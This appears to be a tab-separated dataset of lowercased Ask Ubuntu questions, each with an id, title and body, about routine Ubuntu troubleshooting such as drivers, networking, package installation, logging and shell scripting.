304897	i 'm trying to install vmware tools on ubuntu 12.04.2 lts and i seem to have a problem with kernel headers	i have ubuntu 12.04.2 lts installed on a vmware machine on windows 7 host . i seem to have a problem with kernel headers when trying to install them i did : sudo apt-get install gcc make build-essential linux-headers- $ ( uname -r ) and got this : reading package lists ... done building dependency tree reading state information ... done gcc is already the newest version . build-essential is already the newest version . linux-headers-3.5.0-28-generic is already the newest version . make is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 100 not upgraded . however , when installing vmware tools i get the following error : make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-28-generic' cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/backdoor.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/backdoorgcc32.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/bdhandler.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/cpname.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/cpnamelinux.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/cpnamelite.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/dentry.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/dir.o cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/file.o /tmp/vmware-root/modules/vmhgfs-only/file.c:122:4 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/vmware-root/modules/vmhgfs-only/file.c:122:4 : warning : ( near initialization for ‘hgfsfilefileoperations.fsync’ ) [ enabled by default ] cc [ m ] /tmp/vmware-root/modules/vmhgfs-only/filesystem.o /tmp/vmware-root/modules/vmhgfs-only/filesystem.c:48:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /tmp/vmware-root/modules/vmhgfs-only/filesystem.o ] error 1 make [ 1 ] : *** [ _module_/tmp/vmware-root/modules/vmhgfs-only ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-28-generic' make : *** [ vmhgfs.ko ] error 2 make : leaving directory `/tmp/vmware-root/modules/vmhgfs-only' any help appreciated !
304898	trying to configure eth0 and eth1 but failed to bring up eth1	trying to do below on ubuntu 12.04 . trying to configure eth0 and eth1 , eth0 works fine , but failed to bring eth1 . below is the settings /etc/network/interfaces : auto eth0 eth1 iface eth0 inet static address 172.19.20.186 netmask 255.255.255.252 network 172.19.20.184 broadcast 172.19.20.187 gateway 172.19.20.185 iface eth1 inet static address 172.18.182.55 netmask 255.255.254.0 gateway 172.18.182.1 up route add -net 172.19.26.0/23 gw 172.19.20.185 dev eth0 up route add -net 172.19.24.0/23 gw 172.19.20.185 dev eth0 up route add default gw 172.18.182.1 dev eth1 when /etc/init.d/networking restart is done , giving below error : $ /etc/init.d/networking restart rtnetlink answers : file exists failed to bring up eth1 even ifdown eth1 and ifup eth1 giving above error . can anyone help how to resolve this ?
304900	how do i install my wireless card driver offline	i just installed xubunu 13.04 , but it did n't detect my wireless card . this is my wireless card : broadcom corporation : bcm4312 802.11b/g lp-phy : wireless 1397 wlan mini-card i googled about it , and i found this solution : once you have confirmed that your wlan device is supported , you may proceed to installing the driver by running the following command from terminal window . sudo apt-get install firmware-b43-installer the problem is that i ca n't run this command in terminal , because i 've no connection in xubntu , and for the moment i 'm posting this thread from windows . i downloaded the package firmware-b43-installer from debian , and when i tried to install it , it gold me that i need the b43-fwcutter package so i download it , and when i tried to install it the terminal shows me that the installation needs some sources from the internet . i do n't have an ethernet or some other internet connection source , the only way i can access to internet is from windows . how can i install my wireless card driver offline ?
304901	changed display driver , boot now gets stuck	on a laptop with a nvidia geforce 9200m gpu , i wanted to move to the [ recommended ] ( version-current ) from the version post-release updates ussing additional drivers . everything went ok during the installation , and after that i restarted my pc . the boot stops at this : ! i ca n't ctrl + alt + 1 to go to a terminal , and it hangs there for at least 5 minutes but if i press the power button , it goes on it 's way to shut down the laptop without issues , and displaying the normal messages it shows when closing . how can i make this to work , cause i 'd really hate to reinstall ubuntu again ( especially since it seems that i bust my install once every 2 months ) i last time this happend to me , i could get it to work if i chose another version of linux in the grub menu . using the recovery mode did n't help
304907	usb 3.0 , screen brightness , and realtek hd audio ( 13.04 )	i 'm very new to linux , have played around a bit every now and then , but never really got the hang of it . i 'm now tired of ms , so decided to give it a fighting chance . i have a acer aspire 5750g , intel core i7 , geforce gt540m , nvidia optimus and 8gb ram - i would love to know how to install my usb 3.0 drivers , my realtek hd audio , aswell as how to restore my ability to adjust my screen brightness ? ? ? my apologies if that is a tall order : - ) like i said , i 'm very new , and dont know much of linux , but i 'm a quick learner ... your help is greatly appreciated ! ! riaan
304912	installing 32 bit libraries fails	i am trying to install 32-bit libraries on ubuntu 13.04 64-bit as i 've done many times before on ubuntu 12.04 and debian 6/7 . there seems to be a problem with some packages . this is what i get when i run apt-get install ia32-libs : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apport-gtk : depends : gir1.2-wnck-3.0 but it is not going to be installed recommends : update-notifier but it is not going to be installed compiz : depends : compiz-gnome but it is not going to be installed gir1.2-gtk-3.0 : depends : gir1.2-pango-1.0 but it is not going to be installed gnome-settings-daemon : depends : libgnomekbd8 ( > = 3.5.1 ) but it is not going to be installed ia32-libs : depends : ia32-libs-multiarch libappindicator3-1 : depends : libdbusmenu-gtk3-4 ( > = 0.4.2 ) but it is not going to be installed recommends : indicator-application ( > = 0.2.93 ) but it is not going to be installed libebook-1.2-14 : depends : libedata-book-1.2-17 ( > = 3.7.90 ) but it is not going to be installed libedataserver-1.2-17 : depends : libgcr-3-1 ( > = 3.8.0 ) but it is not going to be installed libgail-common : depends : libgail18 ( = 2.24.17-0ubuntu2 ) but it is not going to be installed libpangoft2-1.0-0 : i386 : depends : libharfbuzz0a : i386 ( > = 0.9.9 ) but it is not going to be installed overlay-scrollbar : depends : overlay-scrollbar-gtk2 but it is not going to be installed software-properties-gtk : depends : python3-aptdaemon.gtk3widgets but it is not going to be installed system-config-printer-gnome : depends : python-gtk2 but it is not going to be installed depends : python-notify but it is not going to be installed depends : python-gnomekeyring but it is not going to be installed ubuntu-sso-client : depends : python-ubuntu-sso-client ( = 4.2.0-0ubuntu1 ) but it is not going to be installed ubuntuone-control-panel : depends : python-ubuntuone-control-panel ( = 4.2.0-0ubuntu1 ) but it is not going to be installed zeitgeist : depends : zeitgeist-datahub but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . anybody knows what 's the problem and how i can resolve it ?
304913	i want to change only folder icons from humanity theme.how do i do it ?	i love the new files , app center and software update icons specially an thus want to remain on humanity icon set . but i hate the folders ! i want to use the folders from the faenza icon set . which folder should i copy from the faenza icon set to the humanity icon set so that this happens ? thankyou ! : )
304915	/var/log/syslog empty	apparently my logs stopped working around apr 10 , as the current /var/log/syslog is empty , and /var/log/syslog.1 has the following for its last entries : apr 10 20:25:01 li243-206 cron [ 2883 ] : ( root ) cmd ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) apr 10 20:27:16 li243-206 kernel : kernel logging ( proc ) stopped . apr 10 20:27:16 li243-206 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 2320 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . i tried writing to it with logger `` hello world '' , but nothing show up . rsyslog is indeed running , if i check with ps . so i found this similar question , which led me to discover that /dev/xconsole was missing . i created it , rebooted , but still no joy . how can i get syslog to work ?
304918	kill all processes except the one running the script	i have a aim of killing all processes ( using killall -u myuser ) and then restart some processes . the problem is when the script reaches killall -u myuser it just terminates . how can i terminate everything ( same as killall -u myuser ) but not the script one .
304919	can not install dropbox from cli or software centre	i initially tried installing it using the steps listed here : http : //www.liberiangeek.net/2012/10/how-to-install-dropbox-in-ubuntu-12-10-quantal-quetzal/ i got the following error from it : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . i tried installing from the software centre , but that keeps crashing everytime i try to install with the following error : executable path : /usr/share/software-center/update-software-center-channels problemtype : crash i also tried the installation instructions achu on the `` how to install dropbox ? '' thread here but that did n't work either . i tried downloading the .deb file from dropbox , that failed too . i am running quantal and i am fairly new to ubuntu , so i may just be doing something very stupid here .
304922	how to publish a game that requires native libraries on the ubuntu sofware center	very recently i published a proprietary game on the ubuntu software center . i uploaded a debian package containing the binary files . since the game is written in java i used 'any ' architecture in the debian control file . now i have an update ready that should fix some minor bugs and improve the overall quality . the only problem i have is that it requires a native library . there is a version for 32 bit and 64 bit and the application automatically chooses the correct library . it is needed for gamepad support ( jinput ) . if i enter `` any '' as architecture in the control file , it displays a warning as soon as i install the application . do i need to create two separate debian packages ? and if this is needed , how can i submit this update ? my own ideas for this are : i could upload a zip file containing both debian packages , but i do not want to cause the reviewers extra work . both packages contain almost the same content , since the 64 bit package also requires the 32 bit native libraries in some cases . maybe there is a way to create a single debian package that will install on both 64 bit and 32 bit ubuntu versions without warning ? please let me know if this is not the correct place to ask this question !
304923	wifi is connected but internet not working ?	i have a lenovo x230 running ubuntu 12.04lts . i 've been using it just fine for a while , but all of a sudden the internet 's stopped working . it 's connected to the router just fine ( i can see the antenna bars saying it 's connected ) but when i try to go to a webpage , it 's just loading forever . i 've tried the fix listed here ( http : //ubuntuforums.org/showthread.php ? t=1985079 ) but it has n't done anything ( the instructions are a little confusing though ) . i 'm booting windows 7 right now and the internet works just fine when i 'm on windows , so i know it must be a problem with ubuntu . i have n't touched any network settings before this problem happened , and i 've been using it just fine for months , so i do n't know why i 'm getting this problem all of a sudden . oh and i have n't updated anything in a few weeks ( you know when the update manager pops up every so often listing all the things there 's an update for ) so i know it 's not some update that broke it .
304925	is there a workspace handler in unity like that of gnome-shell ?	i used gnome-shell for a while and i became addicted to the possibility to add workspaces simply moving a window in the last one on bottom ; and obviously to remove all remaining empty workspace except the last , used as a trigger for new ones . i do not know if i explained well . is there any extension/configuration to add this feature to unity ? edit : to avoid confusion i post a video that shows how workspaces are added and removed automatically by gnome-shell thanks
304926	impossible to connect to wifi	following my question from yesterday where i could n't find one particular wifi , this wifi does now appear correctly . but i ca n't connect to it . i have the right password ( it is in my phone , and i use it ) , but when i click on the network and enter the password , it tries for a moment and then prompts me the password window again , without connecting . i 'm on ubuntu 12.04 with a hp mini 5103 , with intel . thanks !
304927	how to achieve more output about hidden processes ?	unhide has found hidden processes on my machine with given pid . these pid are not listed in top or in htop . how can i get more output of these hidden processes , when pid is given ?
304934	is ubuntu 's archive signing key available via https somewhere ?	i 'm writing a program that needs to download gpg keys for various distributions to do unattended net installs . to do this securely and in an automated way , i need to download the key via https , which means `` gpg -- recv-keys '' is n't an option . other distributions ( e.g. , fedora ) make their keys available on their websites via https ( e.g. , https : //fedoraproject.org/static/e8e40fde.txt ) , but i ca n't find the ubuntu key file anywhere on ubuntu.com . does anyone know where i can get it via https ? thanks .
304939	dovecot default config ?	i have neglected to make a backup of the file /etc/dovecot/conf.d/10-master.conf could somebody who has a fresh install or a working config file post it ? i tweaked a setting and now i can not figure out the problem . here is a copy of my current configuration file . i formatted it in .txt so that it would allow me to upload it . https : //dl.dropboxusercontent.com/u/93765018/10-master.conf.txt
304943	how does one get a hold of the details regarding a system/application crash	is there a way to generate a decent looking report with the /var/share/apport/*.crash files ? if not , how does one get a hold of the details regarding a past system error ?
304945	unity stopped working in 3d after software update	today i installed some update package and an hour or two later when i restarted my machine , unity was running in 2d . there were two radeon packs in those updates which i suspect are the culprit . i attempted to purge the fglrx completely and do a fresh install of the amd drivers ( currently running with amd hd 7400m gpu and ubuntu 12.04 lts ) but i did not manage to purge it . does anyone have any suggestions ? million thank yous in advance !
304948	firefox 21.0 wont start on ubuntu 12.04	firefox 21.0 wo n't start on my ubuntu 12.04 system with error message : your firefox profile can not be loaded . it may be missing or inaccessible . i have tried everything including removing the ~/.mozilla folder , reinstalling firefox , setting the owner and user rights of the ~/.mozilla folder . nothing works ! what am i missing ? is there any other system folder i have to change the user rights on ?
304950	ubuntu touch preview nmcli connection for 3g data throws an error	i tried to setup a 3g data connection on ubuntu touch preview ( latest raring build ) but if i try to start with `` nmcli con up `` o2 connection 1 '' i get the error : unknown parameter : o2 connection 1 error : id or uuid has to be specified here is my config file created from nm-connection-editor : [ connection ] id=o2 connection 1 uuid=ec4ef9f6-f466-4e18-b250-4437b208bd45 type=gsm autoconnect=false [ gsm ] number=*99 # apn=internet network-type=0 [ ipv4 ] method=auto [ serial ] baud=115200 can someone help me with this issue ? id and uuid are in the config file . thanx a lot ! ! ! greets andi
304957	how to install additional gimp fonts	i want to install more text fonts on gimp . currently i have only the default fonts . where can i download and install them ? i am on ubuntu 13.04 , using gnome - lastest version .
304958	intel atom z2760 compatible with ubuntu ?	does anyone know if intel atom z2760 is supported by ubuntu ? i am interested by 2 different tablets : samsung xe500tic-ao1nl tablet pc acer iconia w510 10.1-inch tablet both have a cpu with intel atom z2760 . is this kind of tablet compatible with ubuntu desktop and/or with the tablet version of ubuntu ?
304959	is there a way to tell which packages i 've installed via apt-get , minus the auto-installed ones ?	i try to keep a log of the programs i installed via apt-get in the command line to carry them to my next ubuntu installation . the thing is sometimes i install something to see if it suits me . after testing i sometimes forget to add those to my log . when i try to find out from the history in software manager , it shows me a long list since it also includes the auto installed ones too . is there a way i can only sort out the ones that are n't automatically installed just because i installed gem or something ? i want it to know only gem not the libraries that came with it , since they will be automatically installed anyways next time i install gem . also are there any tools to help with package installations ? what i mean is that , there was once a tool i 've used to keep track of the programs you compile and install by hand . it would track the makefile 's doings and make it easier to uninstall or undo what it has done in the future . is there a tool that you might have heard of out there ? some ideas to make it easier in the future one other solution i can think of is to write an install script that first logs the program name , then runs through apt-get install xxxx . or is there a better way to pipe the command arguments of apt-get to log them , by aliasing the command or something ? this would be better since it would keep auto-completion of package names when you press tab after sudo apt-get install chromium-br ...
304964	disable password prompt upon startup in ubuntu server	currently , each time i restart my ubuntu server , it 's prompting for a login password . how do i disable this feature so that i when i restart my ubuntu server , it does n't require me to enter credentials ? version : ubuntu 12.04.2 lts
304967	interested in trying ubuntu ! few questions	compatibility with computer components ? is this an issue with let 's say a gtx 670 , which i recently purchased ? in addition , an asus m5a97 mb ? i am interested in not just using the system but truly understanding it . best resources for learning this new operating system for me ? thanks a bunch !
304970	how to enumerate and monitor the assigned keyboard shortcuts at anytime in ubuntu ?	for example , the system knows that if i press ctrl+b inside this textarea of ask question the web browser will handle it in some way ( format text as bold ) , and if i press alt+tab it will be handled by gnome ( switch active window ) , etc . how can i know all the assigned keyboard shortcuts and their functions at anytime in ubuntu ? is there any tool that enumerates/monitors/scans such keyboard shortcuts ?
304972	auto mouse click 25 seconds after mouse stops moving	i already have hover click and the other assistive technologies turned off but there is still a click initiated 25 seconds after mouse motion stops . i ca n't find any way to turn it off . i ca n't concentrate to write when my cursor is jumping around the screen by itself . i 'm going to try another distro to see if they have forced the same kind of nonsense on users . if they have i will have to start writing my blog on paper . how stupid is that ?
304973	why did n't the bumblebee driver take effect after installing it and rebooting ?	how i attempted to install bumblebee : sudo add-apt-repository ppa : bumblebee/stable sudo apt-get update sudo apt-get install bumblebee bumblebee-nvidia using this script , i have the following output about my graphics / xorg setup . https : //gist.github.com/nullvoxpopuli/5724159 output : graphics card ( s ) : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 730m ] ( rev a1 ) connected monitors : [ 7.244 ] ( ii ) intel ( 0 ) : output lvds1 connected [ 7.244 ] ( ii ) intel ( 0 ) : output hdmi1 connected current video driver : drm_kms_helper 49394 1 i915 drm 286313 4 i915 , drm_kms_helper video output locations : /dev/video0 /dev/fb0 /dev/dri/card0 /dev/dri/controld64 grub boot command : boot_image=/boot/vmlinuz-3.8.0-23-generic root=uuid=465876a7-4c66-4160-822f-9c1d5cd30037 ro quiet splash vt.handoff=7 modprobe.d drivers : /etc/modprobe.d/ /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/bumblebee.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/nvidia-304_hybrid.conf /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/mlx4.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-watchdog.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/vmwgfx-fbdev.conf /etc/modprobe.d/dkms.conf /etc/modprobe.d/blacklist-ath_pci.conf do we have a xorg.conf file ? ls : can not access /etc/x11/xorg.conf : no such file or directory glxinfo : /home/me/scripts/which-graphics-driver : line 25 : glxinfo : command not found drivers loaded by xorg : [ 5.954 ] ( ii ) loadmodule : `` glx '' [ 5.958 ] ( ii ) loadmodule : `` intel '' [ 5.961 ] ( ii ) loadmodule : `` vesa '' [ 5.962 ] ( ii ) loadmodule : `` modesetting '' [ 5.963 ] ( ii ) loadmodule : `` fbdev '' [ 5.966 ] ( ii ) loadmodule : `` fbdevhw '' [ 7.244 ] ( ii ) loadmodule : `` dri2 '' [ 7.523 ] ( ii ) loadmodule : `` evdev '' [ 7.534 ] ( ii ) loadmodule : `` synaptics '' i 'm using ubuntu 13.04 update ( summary of comments ) : optirun app-name produced an error , so i installed the package it suggested ( mesa-utils , i think ? ) and tried optirun firefox and got this error : [ 2971.281588 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 2971.281649 ] [ error ] aborting because fallback start is disabled.1 next , was to check the /etc/bumblebee/xorg.conf.nvidia file , and see if it had the correct busid . it did n't , so i changed it from pci:01:00:0 to pci:01:00.0.. but i got the same error . : - ( here is my current /etc/bumblebee/xorg.conf.nvidia file if anyone is curious : http : //pastebin.com/hreaubsf it was suggested that i run glxinfo from the terminal , but that has a ton of output that i do n't know how to read . as of june 12th , 2013 9:48pm est , i still have this error when trying to use optirun : $ optirun firefox [ 111951.191738 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 111951.191804 ] [ error ] aborting because fallback start is disabled .
304976	path is not affected by .pam_environment	running ubuntu 13.04 , i 'm trying to add variables to path for the session , which is recommended to do inside .pam_environment , but nothing seems to work . here 's what it looks like : java_home default=/usr/lib/jvm/java-7-oracle idea_home default=/usr/local/idea-iu-129.451/bin lighttable_home default=/usr/local/lighttable cloudify_home default=/home/eliranm/builds/gigaspaces-cloudify path default= $ { path } override= $ { path } : $ { java_home } : $ { idea_home } : $ { lighttable_home } : $ { cloudify_home } it seems all variables are set but the path , or that it is overridden somehow . i tried to prepend or append the $ { path } variable , to use default only , override only , tried to just set a hard-coded path as a value , all to no avail . i 'm following the recommendations from the ubuntu help community , and i want to avoid concatenating hard-coded paths to the path inside /etc/environment as it 's not the right scope , plus , it will be hard to maintain with no variables . others may be affected by this issue , as stated here , but no one provided a solution so far . how to make this work ?
304983	how to stop update manager from trying to force upgrade to 13.04 ?	so i am running 12.04.1 lst on my machine . i never upgraded to 12.10 because apparently it does n't work well with my evga 550ti . now , when ever i boot up the update manager notifies me that not all of the packages are able to be installed , and if i want to do a partial upgrade . i 'm not able to do regular updates because each time i try it tries to upgrade me to 13.04 . in my software resources menu i have set the `` notify me of a new ubuntu version '' to `` never '' and it still pops up . any ideas on how to stop this ?
304985	msp430/bin/ld : can not find -lc	i installed successfully msp430-gcc 4.7.0 compiler . the compiler at the final stage of the linking process it shows me the following error for ubuntu 12.04. msp430-gcc -mmcu=msp430f1611 -wl , -map=contiki-sky.map -wl , -- gc-sections , -- undefined=_reset_vector__ , -- undefined=interruptvectors , -- undefined=_copy_data_init__ , -- undefined=_clear_bss_init__ , -- undefined=_end_of_init__ hello-world.co obj_sky/contiki-sky-main.o contiki-sky.a -o hello-world.sky /opt/mspgccx/lib/gcc/msp430/4.7.0/../../../../msp430/bin/ld : can not find -lc collect2 : error : ld returned 1 exit status make : *** [ hello-world.sky ] error 1 i extended my search path as msp430-gcc 4.7 was installed under /opt at ~/.bashrc to include the /opt directories . msp430-gcc -- version msp430-gcc ( gcc ) 4.7.0 20120322 ( mspgcc dev 20120911 ) copyright ( c ) 2012 free software foundation , inc . this is free software ; see the source for copying conditions . there is no mswarranty ; not even for merchantability or fitness for a particular purpose . msp430-ld -version gnu ld ( gnu binutils ) 2.22 ( mspgcc dev 20120911 ) copyright 2011 free software foundation , inc . this program is free software ; you may redistribute it under the terms of the gnu general public license version 3 or ( at your option ) a later version . this program has absolutely no warranty . $ gcc -v using built-in specs . could not find specs file msp430mcu.spec collect_gcc=gcc target : msp430 configured with : ../gcc-4.7.0/configure -- target=msp430 -- enable-languages=c -- program-prefix=msp430- -- prefix=/opt/mspgccx thread model : single gcc version 4.7.0 20120322 ( mspgcc dev 20120911 ) ( gcc ) $ ld -v gnu ld ( gnu binutils for ubuntu ) 2.22 uname -a linux px 3.5.0-32-generic # 53~precise1-ubuntu smp wed may 29 20:35:31 utc 2013 i686 i686 i386 gnu/linux i tried : sudo apt-get install libcv-dev libcvaux-dev libhighgui-dev sudo apt-get install glibc-static sudo apt-get install build-essential sudo apt-get update & & sudo apt-get install libc6-dev any suggestions ?
304991	tor fails to start	when i run vidalia this is first thing appears in picture below i also saw this and thisand applied them and they did n't work anyone can help please ? ?
304993	how to invoke citrix receiver from the command line ?	when invoking the citrix receiver from either firefox or the citrix receiver , the citrix window will flash up quickly then disappear and then after about 3 minutes the vm will appear and all is well . how can i get rid of the long delay ? do you have more details about invoking citrix receiver with linux command line . the edocs does not show details about specifying the actual server .
304998	why does `` about : blank '' tabs open up in chrome every time i search in unity 's sidebar , even before pushing enter ?	ubuntu 13.04 , google chrome version 27.0.1453.110 i assume it 's related to a program i have installed via apt-get , but not sure which . as i am typing , while it is doing the `` auto-completion '' searching , windows keep popping up , even if chrome is closed .
304999	not able to execute a .sh file : /bin/bash^m : bad interpreter	i wanted to execute a shell script : -rwxr-x -- x 1 root root 17234 jun 6 18:31 create_mgw_3shelf_6xipni1p.sh i tried to do a standard procedure , but i am got this error : ./create_mgw_3shelf_6xipni1p.sh localhost 389 -l /opt/fews/sessions/amgwm19/log/2013-06-06-143637_cla-0 debug cd/etc/opt/ldapfiles/ldif_in ; ./create_mgw_3shelf_6xipni1p.sh localhost 389 -l /opt/fews/sessions/amgwm19/log/2013-06-06-143637_cla-0 **error sh : ./create_mgw_3shelf_6xipni1p.sh : /bin/bash^m : bad interpreter : no such file or directory** what does it mean ? i was doing this as the root user under the root group . does it mean that the file does not have the correct permission for the root user ?
305008	i want to create my own ubuntu phone preinstalled touch image	i want to create my own ubuntu phone preinstalled touch image for an android phone . preferably for a phone that is not supported yet . i 'm a newbie to this type of stuff but as a computer engineering student think the learning experience will be very valuable . are there any resources `` books , online tutorials ... '' available that can get me started ?
305011	package not available in 1304 ?	is it normal that the package gnome15 is not available for 13.04 ? i tried to follow these instructions http : //www.gnome15.org/index.php ? option=com_content & view=article & id=22 & itemid=33 but received the following error message when doing apt-get update : w : failed to fetch http : //www.gnome15.org/raring/./packages 404 not found is there any workaround ?
305017	what will happen under this situation with ubuntu one ?	i have synced some folders from ubuntu 12.10 now i installed 13.04 and manually deleted some ( many actually ) files from the synced folders ( i did a manual backup in an external hdd and then organised the data b4 re-copying it to 13.04 ) now when i sign in to ubuntu one , will the deleted files be downloaded again or will the files on the web be deleted rather ? i want the 2nd situation to take place actually ! m not signing in to ubuntu one untill i get the answer !
305020	ubuntu desktop background ?	i run ubuntu 12.04 64bit on both my laptop and my desktop . i use the same desktop background ( and same file format ) on both computers . when i power up my laptop it brings up the user login screen , and the background picture shows behind the login prompt , then my icons appear when i log in . this does n't happen with my desktop however . when i power up my desktop i get the login screen as normal , but i get the standard orange/purple background that is the default wallpaper . how can i make the pc do the same as the laptop ?
305024	( xubuntu ) - how to turn off laptop screen while external screen is connected	hi i just installed xubuntu on my laptop , now i want it to disable the laptop screen as long as the external screen is connected . but when i disconnect the external monitor i want the laptop screen to be activated again . how can i configure xubuntu to work this way ? i have a nvidia graphics card and an intel chipset in my laptop . hope you guys can help me out .
305030	how to mount a cd/dvd in dosbox ?	i 'm using dosbox 0.74 , which works properly and can successfully mount a `` c '' drive . however , i do n't know how to mount a dvd drive . i 'm trying to install star control 3 from a disk so that i can play it with dosbox , but i ca n't mount the `` d '' drive . i 've tried mount d /media/cdrom0 -t cdrom which http : //www.ubuntugeek.com/howto-auto-mount-a-drive-in-dosbox.html claimed would work . i 've looked at http : //www.dosbox.com/wiki/mount # linux but i did n't understand what exactly it was saying . so i guess what i 'm really asking is does anyone know what commands to use to mount a cd/dvd using dosbox in ubuntu 12.04 ?
305032	install newest bumblebee nvidia driver	i am using 13.04 and i followed this guide https : //wiki.ubuntu.com/bumblebee but my drivers are a little bit dated , they only support opengl 4.0 . how can i find out what version i am running and how can i update to a newer version ?
305037	intel graphics 4500hd- x3 game ( linux ) on ubuntu 13.04	yesterday i tried to install x3 : reunion ( linux distribution ) on ubuntu 13.04 32-bit . my laptop uses the intel graphics 4500hd . ubuntu 's driver alternative- installed : intel速 ironlake mobile x86/mmx/sse2 . ( this driver was there , when i installed ubuntu . i also used the intel updater , but the intel updater keeps informing me , that i already have the newest driver installed ) is my graphics driver correct ? i ask because after i installed x3 : reunion ( linux distribution ) the game has n't been able to start . i have already searched the internet for many many hours . even so i have n't been able to find any answer to the errors ( check below ) . i am not sure if it 's my driver or a bad game install ( i already tried to re-install the game ) . i have heard that there are others who experienced similar issues on linux trying to install games . maybe someone can help me ? when i start the game launcher , i get this error ( let 's call it , error 1 ) : gtk-warning ** : failed to load module `` liboverlay-scrollbar.so '' : liboverlay-scrollbar.so : can not open shared object file : no such file or directory libgl error : failed to load driver : i965 libgl error : try again with libgl_debug=verbose for more details . libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . when i click on start game i get this error ( let 's call it , error 2 ) : { [ 0xb7772400 ] /lib/i386-linux-gnu/libc.so.6 ( vsprintf+0xa4 ) [ 0xb6bce9f4 ] x3 ( ) [ 0x817ed00 ] x3 ( ) [ 0x81539d5 ] x3 ( ) [ 0x81773b2 ] x3 ( ) [ 0x80cc251 ] x3 ( ) [ 0x81515fa ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0xb6b7f935 ] } i use ubuntu 13.04 32-bit . that 's what i know . i am obviously new to linux . all i need is this game . i 'd like to play it once in a while . but i 'm not experienced enough to solve these errors . one more thing . even that i get `` error 1 '' when opening the launcher , the launcher itself runs fine . when i click on `` start game '' i actually get two messages . error 2 in the terminal and the following message in the launcher ( lgp ) : error opening video . there is no vesa driver installed , your graphics adapter or the vesa driver does n't support the resolution . further information can be found in the manual . well , i already read the `` manual '' ( i would n't call it a manual , though ) . i thought vesa was used in nvidia graphics ? xd i chose the 1600x900 resolution , my native resolution . - yes , i already tried to change the resolution . once i start the game with another resolution , the error disappears . but the game does not work ! so , basically , what are these errors ? ( error 1 and 2 ) is my graphics driver correct ? ( intel 4500hd ) why does n't this game start ? ( x3 : reunion )
305038	13.04 : update-initramfs works but mkinitramfs fails from apt	i 'm experiencing a strange thing , i 've freshly upgraded from 12.10 to 13.04 , everything is fine except that it ca n't build the initrd image automatically , it fails and prints out the mkinitramfs 's usage output . i tried to debug the `` mkinitramfs '' script and it appears the $ outfile variable is never set . however , i 'm able to produce the ramdisk manually like follow : update-initramfs -c -u 3.0.8-23-generic i tried most of the stuff seen on the net : purge , reinstall but no help but nothing , and i ca n't use linux-image is marked as `` broken '' but the kernel exists in /boot .
305040	shared folders stuck when i access it from windows 8	i share some folders from server running ubuntu 13.04 ( desktop ) and i access it from windows 8 . when i enter into folders from windows , the window stuck for a while and the address bar shows loading . after waiting about a minute the folders contents are shown . this stuck is not performed at every folder of directory . i also noticed that happens mainly to folders with heavy files ( eg movie , my photos ) and not folders with pdf files .
305041	ubuntu 13.04 does n't work very well after wallpaper change	i made a wallpaper and added it to my desktop , but when i minimize a window , it just stops working . after i rebooted and logged in , this happened : and now if i minimize something again , the system will crash . oh ... i hid the desktop icons to visualize better and now that i was trying to put them back , unity tweak tool does n't work either . what can i do ?
305043	how do i set/change window placement position without ccsm	i want the default window placement to be center . but i dont want to install ccsm as it slows down ubuntu on unity . how do i set the default window placement position without ccsm ?
305045	where does ttar.gz have to be located at installation ?	i want to install boot-repair_3.193.7.orig.tar.gz to repair my computer as it does n't boot ( only get the `` grub rescue '' prompt ) . now booted on a live usb ubuntu 11.10 . wanted to follow the below steps ( found in this post ) tar -zxvf aircrack-ng-1.1.tar.gz . cd aircrack-ng-1.1.tar.gz make make install after typing the first line , this is the output in the terminal : ubuntu @ ubuntu : ~ $ tar -zxvf boot-repair_3.193.7.orig.tar.gz tar ( child ) : boot-repair_3.193.7.orig.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now does this have to do with the location of the tar.gz ? i downloaded it to the downloads directory , and located it in the archive manager , which shows it 's under the root . please help with step-by-step solution . update : terminal output after cd boot-repair_3.193.7.origas per seth 's suggestion : ubuntu @ ubuntu : ~ $ tar -zxvf boot-repair_3.193.7.orig.tar.gz .gitignore usr/share/icons/hicolor/128x128/apps/boot-repair.png usr/share/icons/hicolor/128x128/apps/os-uninstaller.png usr/share/locale/af/lc_messages/boot-sav.mo usr/share/locale/ar/lc_messages/boot-sav.mo usr/share/locale/ast/lc_messages/boot-sav.mo usr/share/locale/az/lc_messages/boot-sav.mo usr/share/locale/be/lc_messages/boot-sav.mo 